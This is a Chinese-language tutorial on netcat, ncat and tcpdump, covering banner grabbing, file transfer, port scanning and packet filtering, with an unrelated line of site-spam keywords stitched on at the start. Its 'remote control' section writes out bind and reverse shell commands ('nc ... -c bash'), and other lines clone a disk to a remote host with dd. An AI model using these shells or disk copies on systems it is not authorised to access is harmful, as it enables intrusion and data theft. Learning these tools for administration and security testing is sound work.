诸城营销型网站建设,少儿编程几岁开始学最好,工信部备案系统网站,建站之星用做什么网站文章目录 nc的常用选项NC具有的常用功能telnet / 获取banner信息传输文本信息传输文件/目录加密传文件端口扫描远程克隆硬盘远程控制NCAT TCPDUMP简单用法 nc的常用选项
-l 开启监听模式#xff0c;用于入站链接 -p 开放本地端口 -n 远程连接#xff0c;后面要跟上端口 -v …文章目录
nc的常用选项NC具有的常用功能telnet / 获取banner信息传输文本信息传输文件/目录加密传文件端口扫描远程克隆硬盘远程控制NCAT TCPDUMP简单用法 nc的常用选项
-l 开启监听模式用于入站链接 -p 开放本地端口 -n 远程连接后面要跟上端口 -v 显示详细信息 -q 执行操作后退出可以添加延迟时间 -z 端口扫描 -u UDP模式 -c 添加使用权限
NC具有的常用功能
• 网络工具中的瑞⼠军⼑——小身材、大智慧 • 侦听模式 / 传输模式 • telnet / 获取banner信息 • 传输文本信息 • 传输文件/目录 • 加密传输文件 • 远程控制/木⻢ • 加密所有流量 • 流媒体服务器 • 远程克隆硬盘
telnet / 获取banner信息 nc –nv 1.1.1.1 110 nc –nv 1.1.1.1 25 作用可以通过连接端口获取一些banner信息确定服务器上开发的端口是不是此服务 例如ssh服务工作端口是TCP 22 通过此图用nc连接目标服务器22端口不一定就是SSH服务 开放本地服务22端口让服务器通过ssh连接可以发现服务器上SSH服务的banene信息 传输文本信息 Anc -lp 4444 Bnc –nv 1.1.1.1 4444 作用服务器可以开放本地端口让客户端来连接此端口用来做聊天工具 服务器 客户端 传输文件/目录 传输文件 Anc -lp 333 1.mp4 B: nc -nv 1.1.1.1 333 1.mp4 -q 1 或 Anc -q 1 -lp 333 a.mp4 Bnc -nv 1.1.1.1 333 2.mp4 传输目录 Atar -cvf - music/ | nc -lp 333 –q 1 Bnc -nv 1.1.1.1 333 | tar -xvf – 加密传文件 Anc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb 1.mp4 B mcrypt --flush -Fbq -a rijndael-256 -m ecb a.mp4 | nc -nv 1.1.1.1 333 -q 1 端口扫描 TCP扫描 nc -nvz 1.1.1.1 1-65535 UDP扫描: nc –vnzu 1.1.1.1 1-1024 一般用NC使用UDP扫描准确度非常低不建议用NC扫 远程克隆硬盘 A nc -lp 333 | dd of/dev/sda B dd if/dev/sda | nc -nv 1.1.1.1 333 –q 1 远程电子取证可以将目标服务器硬盘远程复制或者内存。 远程控制 正向控制 A:nc -lp 333 -c bash B:nc -nv 1.1.1.1 333 反向控制 A:nc -lp 333 B:nc -nv 1.1.1.1 333 -c bash NCAT NCAT比NC更具有安全性支持加密和身份验证的能力NC不支持。 ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl –allow 进行身份验证–ssl进行加密算法 ncat -nv 1.1.1.1 333 --ssl 通过wireshark抓包对⽐比nc、ncat加密与不加密的流量 nc NCAT TCPDUMP简单用法 No-GUI的抓包分析⼯工具 Linux、Unix系统默认安装 tcpdump -i eth0 -s 0 -w file.pcap -i选择网卡-w保存格式-n筛选条件-r读取文件 读取抓包文件 cpdump -r file.pcap TCPDUMP——筛选 • tcpdump -n -r http.cap | awk ‘{print $3}’| sort –u • tcpdump -n src host 145.254.160.237 -r http.cap • tcpdump -n dst host 145.254.160.237 -r http.cap • tcpdump -n port 53 -r http.cap • tcpdump -nX port 80 -r http.cap
